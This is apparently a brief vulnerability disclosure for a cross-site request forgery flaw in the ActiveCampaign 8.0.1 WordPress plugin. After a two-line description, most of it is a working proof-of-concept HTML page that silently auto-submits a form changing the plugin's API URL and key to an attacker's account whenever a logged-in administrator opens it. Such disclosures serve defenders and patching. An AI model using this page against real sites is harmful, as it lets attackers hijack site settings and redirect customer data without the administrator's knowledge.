The ActiveCampaign 8.0.1 plugin is lacking CSRF check on its Settings form, which could allow attacker to make a logged-in administrator change API Credentials to attacker’s account.
When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed.
<html>
<body>
<form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
<input type="hidden" name="api_url" value="https://yopmail59247.api-us1.com" />
<input type="hidden" name="api_key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>